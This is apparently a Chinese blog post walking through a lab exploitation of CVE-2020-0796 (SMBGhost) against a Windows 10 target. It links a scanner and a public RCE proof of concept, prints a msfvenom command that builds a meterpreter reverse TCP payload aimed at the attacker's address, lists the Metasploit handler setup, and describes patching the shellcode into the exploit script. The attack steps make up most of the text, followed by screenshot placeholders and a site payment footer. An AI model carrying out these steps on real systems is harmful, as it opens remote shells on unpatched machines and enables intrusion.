CVE-2020-0796永恒之黑利用

攻击机ip:192.168.20.133

目标ip:192.168.20.138
靶机thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa
poc
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

下图中说明192.168.20.138存在漏洞

image-20220401141836373

exp需要python版本3.6
https://github.com/chompie1337/SMBGhost_RCE_PoC

生成shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.133 lport=4444 -f py

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HzlOykNI-1648796003051)(https://raw.githubusercontent.com/VVeakee/img_bed/main/202204011421315.png)]

把生成的shellcode粘贴出来

把buf全部替换为USER_PAYLOAD

image-20220401140305788

把替换好的shellcode再去exp利用脚本里替换

image-20220401141102454

msf设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.133
set lport 4444
run

开始实施攻击(确定你的python版本是3.6)

如果出现下图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4QZRmPRI-1648796003054)(https://raw.githubusercontent.com/VVeakee/img_bed/main/202204011438816.png)]

就先ping一下是不是能ping通

image-20220401144008623

果然ping不通

然后去把windows的防火墙关了就能ping通了

image-20220401144112093

再试一下出现了这个,再试一下

image-20220401144203248

然后就成功了这个,再试一下

[外链图片转存中...(img-lBh2nD6m-1648796003056)]

然后就成功了
image-20220401144339147

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值